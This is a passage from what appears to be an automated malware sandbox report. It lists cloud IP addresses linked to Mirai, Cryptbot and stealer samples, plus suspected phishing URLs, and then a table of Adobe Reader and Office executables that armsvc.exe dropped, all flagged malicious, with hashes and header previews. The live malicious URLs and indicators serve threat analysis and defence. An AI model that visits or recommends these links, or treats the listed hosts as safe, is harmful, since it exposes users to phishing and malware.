                                                                                                                                                                • 35.172.163.142
                                                                                                                                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 52.20.129.235
                                                                                                                                                                https://important-wholesale-dress.glitch.me#clerk@tkbtc.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 34.233.54.162
                                                                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                • 18.208.8.205
                                                                                                                                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 23.22.218.104
                                                                                                                                                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 100.24.75.163
                                                                                                                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 18.213.205.79
                                                                                                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 54.141.173.212
                                                                                                                                                                https://important-wholesale-dress.glitch.me#clerk@tkbtc.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 3.229.238.168
                                                                                                                                                                AMAZON-02UShttps://www.tasking.com/sites/default/files/DAS_V7.1.8_Installer.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 3.126.68.57
                                                                                                                                                                https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 13.227.8.47
                                                                                                                                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                • 18.146.222.150
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                • 108.139.47.108
                                                                                                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 44.253.47.12
                                                                                                                                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 18.143.65.123
                                                                                                                                                                https://important-wholesale-dress.glitch.me#clerk@tkbtc.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 108.158.75.87
                                                                                                                                                                http://surl.li/oycpeeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 108.158.75.113
                                                                                                                                                                https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 108.158.75.83
                                                                                                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 18.227.130.159

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1666048
                                                                                                                                                                Entropy (8bit):4.323757196014842
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:TjrNF/ZXGtFBV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:TFGX7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:0134EE4BA756A742626C5A324CCF07D9
                                                                                                                                                                SHA1:813C492EC25BCC58C2EFB2C2D1A7ECD17553156B
                                                                                                                                                                SHA-256:17A8719F5639F9811758D4212BC2000EC1EA3BFC9426D629B07383A708A603EF
                                                                                                                                                                SHA-512:D34BC8976023708232CA3A6777E17F71EA92A7C76E775A1795EB7747EBE864534E921191F82963F469627C0139D10690E48B840B762DAF1655489388353A7D57
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.<...o...o...o...o...o...o...o...oF..o.o.o...o.o.o...o.o.o...o.o.o...o.o.o...oRich...o........................PE..d...OUIK..........".................hC.........@.............................................................................................=..........0...........................`...8............................................................................text............................... ..`.rdata...e.......f..................@..@.data....9...p.......V..............@....pdata...............l..............@..@.rsrc...0...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1953280
                                                                                                                                                                Entropy (8bit):6.9931017192745255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Y0DfhIHHfKnE+RUi/LHgZJJkbipjZS7Vg9N9JMlDlfjRiVuVsWt5MJMs:LfI+RUi/LHkJkOZYgFIDRRAubt5M
                                                                                                                                                                MD5:5177B99935AEF525D4B40168FC4372A7
                                                                                                                                                                SHA1:554A5EBEBD9A5FD9D46561F342E6301AD766EF08
                                                                                                                                                                SHA-256:6062C4B9294FE516B6F56643C52841C2205EA9774D5B72ACB0B447EA1635C432
                                                                                                                                                                SHA-512:41D2F4712DC89986BBD9AF9C2AE2478D190317AF45C56317ADAF1451538A104812D5DC6B780DD5D0A43C3995523FFB43E04C6ADFB9F4978996E9BB890EB17444
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............lY.lY.lY...Y.lY...Y.lY.N.Y.lY.N.Y..lY.N.Y..lY.N.Y.lY.mY..lY...YF.lY...Y.lY...Y.lY...Y.lY...Y.lYRich.lY................PE..d....u.K.........."..........d...... ..........@.....................................................................................{..Q...P|..,.......(;...0.........................8............................................................................text............................... ..`.rdata...).......*..................@..@.data...pX.......Z..................@....pdata.......0......................@..@.rsrc...(;.......<..................@..@.reloc..............................@...........................................................................................................................................................................................................................................

                                                                                                                                                                C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1412096
                                                                                                                                                                Entropy (8bit):7.550903594376863
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:81q1lx7SqE0xJ2pm8siWCm3LHgZpJEHpnVg9N9JMlDlfjRiVuVsWt5MJMs:81q171dxJ6mxQm3LHkJEJVgFIDRRAubE
                                                                                                                                                                MD5:7D90353D66682A31E30C23A552667E14
                                                                                                                                                                SHA1:392579952513A9CF036F8811B93A6557AEFD4864
                                                                                                                                                                SHA-256:9B20CEB17A8F97C48E6D725F325D4B6C6831D77FC7A4DFF641A2A8AE44826444
                                                                                                                                                                SHA-512:04AFE4671719E220F1B44C2A41404F15BB761F3D7CB92E54EA7F923CB4362D63A09A93A5F250E824B0D54FE525B2744AEBF4C1AA26ADA2E97EEC7D4CC7351369
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................N........<.......?.......).$....N..........s.....>.........!.....8.......;.....Rich............................PE..L....2.K.....................................0......................................{...................................S.......@.......h;..........................|...8...........................xO..@...................`...@....................text............................... ..`.data............,..................@....rsrc...h;.......<... ..............@..@.reloc...@...P...0...\..............@...........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2011136
                                                                                                                                                                Entropy (8bit):4.9925980946255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:yew0OYIA1UiuLHgZpJEGJVg9N9JMlDlfjRiVuVsWt5MJMs:yewLYIDiuLHkJEwgFIDRRAubt5M
                                                                                                                                                                MD5:A0A9FAD359EFE63A5444E175FE99A4DA
                                                                                                                                                                SHA1:EA3AF74DE0E8016A4B27985221DD26C44C582FB7
                                                                                                                                                                SHA-256:CC18EEB87E5CA416E360396E45F736BE3F2E542B243094DEDECA804163CBB81B
                                                                                                                                                                SHA-512:686830FFC4747AAE35C13546716BB4765EF02C1D19F32063D1552C2D5A8E2E620BCE99C3939C7302AAAAEBD597612A9395324E7C70543B83D70ABF96576BF79A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@T.m...m...m...?...m....C..m.......m......+m....U..m...m/..l.......m......+m.......m.......m..Rich.m..........................PE..L....2.K............................%Q.......0...............................P......S................................{..W...t|.......0..................................8...............................@...............0....|..@....................text............................... ..`.data............"..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1629696
                                                                                                                                                                Entropy (8bit):4.244792512891996
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:FQEZrZrV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:iq7Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:7D09AD60F8A7CF4557171B5FF02F599C
                                                                                                                                                                SHA1:D6DF010B6B9E26524D5D4DDA3DF145D2EF4402E7
                                                                                                                                                                SHA-256:7FC43829DE8498CFCB83F6A6B1EF7596753E903D9D1A0A817B4CD87B5D810B25
                                                                                                                                                                SHA-512:DA6DF752C47A9410D64F7298C2C9D6C3428FFCE4C4F0B821F8AB495F79B79694F9102C997144C1C2BDB9544FA7902DF7AEB515F56DB59B3F0F8FF02B8F59AFCE
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#wR.#wR.#wR.r.R.#wR.q.R.#wR.q.R.#wR.q.R.#wR.q.R.#wR|.R.#wR|.R.#wR"+*R.#wR|.R.#wR.#vR."wR...R.#wR.q.R.#wR.#.R.#wR...R.#wRRich.#wR........PE..L.....\.................J..........z........`....@.......................... ..............................................4....................................... c..8...........................`...@............`...............................text...;I.......J.................. ..`.rdata......`.......N..............@..@.data...l...........................@....CRT....4...........................@..@.rsrc...............................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1786368
                                                                                                                                                                Entropy (8bit):4.567779839909105
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:p9exZPB8jVg9N9JMlDlfjRiVuVsWt5MJMs:be9egFIDRRAubt5M
                                                                                                                                                                MD5:99A5057F85F822E9CD6AD583DA879449
                                                                                                                                                                SHA1:AD1EF1B43421418427B33729D3081FB14509A2D7
                                                                                                                                                                SHA-256:67F34ADDBA9B603F029D5042E94D99071081765996D4A1DBEF83F97016DD7FD4
                                                                                                                                                                SHA-512:EAD94899CDEFCA818D03AF78F2C9B33E3BB752790CB08FF4AAA6F15A285738F7302B8748469CDE44FC184F39E03D3119751865EDC265CD37973DC850B2758110
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......".(.fbFFfbFFfbFFo..FtbFFu.EGlbFFu.BGjbFFu.GGbbFF'.GGdbFF..BGebFF..@GgbFF..GGwbFFfbGFGcFFu.CGNbFFA.;FwbFFA.+F.bFF'.CG}bFF'.BGgbFF'..FgbFFfb.FgbFF'.DGgbFFRichfbFF........................PE..L...|..\.........."......^...........J.......p....@..........................p..............................................`........0..................................T...........................h...@............p..0............................text....\.......^.................. ..`.rdata..vh...p...j...b..............@..@.data....L.......F..................@....rsrc........0...0..................@..@.reloc.......`.......B..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10378240
                                                                                                                                                                Entropy (8bit):7.01104983752925
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:/rbT54hEP+Su80qyLfPeLDo/uLGM7gbl91hxkPZ34Uf:rCnfW/JLGMcblLhe34Uf
                                                                                                                                                                MD5:C89020B56B3577C937A41B35C46E53F9
                                                                                                                                                                SHA1:5E6DC76226A6860705888331D2B6E7C673B9B98E
                                                                                                                                                                SHA-256:3B179C9101AFAD3CDB24CD497F3DAE75E76C7275E7500281217C2890E6DE51D6
                                                                                                                                                                SHA-512:0EC739EF0D1F0DE5F7B2D40BA0DE7DBCA6807033C83E473735583F9242E64F5964AC6B0C8A9A442F24F02AEB83B3DB6D2DA289897E412E14BBB678EF756ADE8E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......m%.;)D.h)D.h)D.hF .i3D.hF .i.D.hF .i3D.h..2h(D.h:".i2D.h:".i.D.h:".i.D.hF .i(D.h)D.h,E.hF .i$D.h)D.h.E.hh#.ilE.hh#.i(D.hh#.h(D.h)Dbh/D.hh#.i(D.hRich)D.h................PE..L....vS\.........."......v...J....................@.................................`O..................................l...L...........0.w.............................T...................4.......x...@...............L............................text...%t.......v.................. ..`.rdata..VM.......N...z..............@..@.data...............................@....rsrc...0.w.......w..z..............@..@.reloc...p...p...`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26760704
                                                                                                                                                                Entropy (8bit):7.989745711270434
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:393216:Tg7Wcit8jq7MhRzliy3XYfZCuyB7PArYxeAmIn6F8/I0TFDS0a6CGCcd/RUf:PehRaEuEAzAmIn0P0TFDSf2
                                                                                                                                                                MD5:5CB61EDFC20E517720F495A6E8E6642C
                                                                                                                                                                SHA1:02D8E2E75C71921BC01D9B5589B80D36DC6F5198
                                                                                                                                                                SHA-256:A68D3AD379126DD7F91E774EEF454B1D562521BE039E06729F61D9D9D2C9FD77
                                                                                                                                                                SHA-512:67A99C01FEA1C520B37E31F00D59BE00FDCB4B425D7896C445C7D80E528F3256333B066796ADFC03703BC2611072A5B774729AAE747D2B6BA6FD520AF0B36935
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........sP...........................................................................................................Rich....................PE..L....vS\.........."......2...F......C .......P....@.................................95......................................h...T..................................0...T...................(...........@............P..<............................text...k1.......2.................. ..`.rdata..8`...P...b...6..............@..@.data...0...........................@....rsrc.............................@..@.reloc...............f..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3098624
                                                                                                                                                                Entropy (8bit):6.592253991459694
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:N5AEcdj/MDDBAq1gw3y0GbhygZ4O8b8ITDnlqFWH0gFIDRRAubt5M:N5ABgf2qT3xVUf
                                                                                                                                                                MD5:BA6CD99497B3D70E7AC70317874BEF54
                                                                                                                                                                SHA1:4687663275EAD376914913FE653ECF74B9D489A9
                                                                                                                                                                SHA-256:5B8E4AADE948E30A3BC6D16D639D467239080AF2DC7E6325D240AD529A447988
                                                                                                                                                                SHA-512:9A259FF8BF6A1C42421DA69D73AFF8007E6CFA13CD93F2CA1699C6A7D55BF2260FB9D5005DDDDC7F7A873A9F6DCD47C86301B7DAF2B08C0B9A8F47053B2FE1E6
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............e...e...e..f...e..`.0.e.ll....e..f...e..a...e..`..e..a...e..c...e..d...e...d.).e..`.X.e..e...e......e.......e..g...e.Rich..e.........................PE..L.....j\.........."......l..........g.............@.........................../......./.................................x.......d....P..0O..............................T...................d........t..@...............(...... ....................text...~k.......l.................. ..`.rdata...X.......Z...p..............@..@.data....n.......>..................@....rsrc...0O...P...P..................@..@.reloc........%......X%.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1520128
                                                                                                                                                                Entropy (8bit):4.028202088457785
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:EOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:EuVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:D8735E55F68AEBA6224702FD5D4ECC27
                                                                                                                                                                SHA1:E1E657F15980C381AA51866310A32C3FECD3332A
                                                                                                                                                                SHA-256:A62FADC378F7AC30F4DE8CCCA1C4C1541B6DBB19CF6DAD401A3930C6444686D5
                                                                                                                                                                SHA-512:E996E1AFF64DE80679ACE064CB13FC8C05B5B02A78276FC5B9CF66EA7F4DA6CCC1F9FA80C2A86DC871B4B6FD3945DC360E1E8EE98DD0C9997BF1CA7874F4F968
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."d..f...f...f...o}S.j...uc.d...uc.q...uc.k...uc..b....a..c...f...6...'b.e...'b?.g...f.W.g...'b.g...Richf...........PE..L....pS\.........."......(...........+.......@....@..........................p.......T.......................................M.......p..............................`E..T............................E..@............@..L............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data...D....`.......D..............@....rsrc........p.......F..............@..@.reloc...............R..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1537024
                                                                                                                                                                Entropy (8bit):4.0750608496375476
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:VbV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:VxVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:8043E7529E75069550A338B28440D05D
                                                                                                                                                                SHA1:E628534A1FF2A2CBB4B74A80AAF578EA830A6082
                                                                                                                                                                SHA-256:4DCEAD6AD5F5547B3E3D857430D85436E8EC04EC76790DEAB0A744F8AB8D10DC
                                                                                                                                                                SHA-512:A61A8416CB7878C24D4BCE709888EF2DDB4B187A65DAF9A6F153F2AF016EB7853C13782741C673E63C32C91DBEE450B4FEA915D23B2A6CD674DBDA3DC13065B4
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..^..^..W...N..M...Z..M...S..M......M...Z..1...Q..^.........Y....q._..^..._......_..Rich^..........PE..L....vS\.........."......Z...B.......[.......p....@.................................6O..........................................h...................................pv..T...................hw.......v..@............p..<............................text....Y.......Z.................. ..`.rdata...(...p...*...^..............@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6506496
                                                                                                                                                                Entropy (8bit):6.7900703234484
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:awn75ZycAIHTHsxr/xnYrs4BAxxQEW5Uf:r7w0HcywF0Uf
                                                                                                                                                                MD5:CA8C2323636725D49B9D3CE32A16D213
                                                                                                                                                                SHA1:1A41FDDCF2CAD82F8DF0DE02CBA49BD34DE9444C
                                                                                                                                                                SHA-256:1B5FE2AEF099F869B08B70A10A1703BEB25C0A40FE5BD57354B41540CA315CB7
                                                                                                                                                                SHA-512:56EC5D440D629C6587A1E44D4510C4DF8E5C41B7D8A92971B68FC57E656EA1F023F7B3AC66476C9AB01BAB930CB58E703B0CACD1ADFFC381D579C0705F819210
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........:...[...[...[...?...[...?...[...=...[...=...[...<..~[......[......[...<...[...=..W[...?...[...?...[...?...[...[...Z...<...[...<...[...<q..[...[...[...<...[..Rich.[..................PE..L....nS\.........."......8D..................PD...@...........................c.......c..............................oQ.\....uQ.,.....V.(............................+J.T...................p+J.......E.@............PD.(....oQ.`....................text....7D......8D................. ..`.rdata..<J...PD..L...<D.............@..@.data....\....Q.......Q.............@....rsrc...(.....V.......U.............@..@.reloc....... V.......U.............@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1637888
                                                                                                                                                                Entropy (8bit):4.27976833697124
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:qk9WbSIlaftV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ONgffVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:4E1B7382BF495F8A51ADCE4AEA3495C4
                                                                                                                                                                SHA1:9C839D52E3817E58DA726C9DB3CC5DEC418634F4
                                                                                                                                                                SHA-256:B24789921987FDC29EC31C32DAEE9E6B002370113088CEDD1987569BD74F363C
                                                                                                                                                                SHA-512:7438AB682424CCBB1652A259F617146310C8A20D4C62C90C4E8C1CD3B148FC64F0A37AD404979B134DE8B49BFCAF86BB2C926FB979098AC09BF4B49341C3DA4D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x2...a...a...a...a...a,x.a...a...`...a...`...a...`...a...`...a..`...a...aE..a..`...a..a...a..a...a..`...aRich...a........PE..L......\.........."......"..........b........@....@..........................@..............................................0{..@.......h............................W..T....................X......(X..@............@...............................text.... .......".................. ..`.rdata..XW...@...X...&..............@..@.data................~..............@....rsrc...h...........................@..@.reloc.......@......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1583616
                                                                                                                                                                Entropy (8bit):4.162177050945906
                                                                                                                                                                Encrypted:false
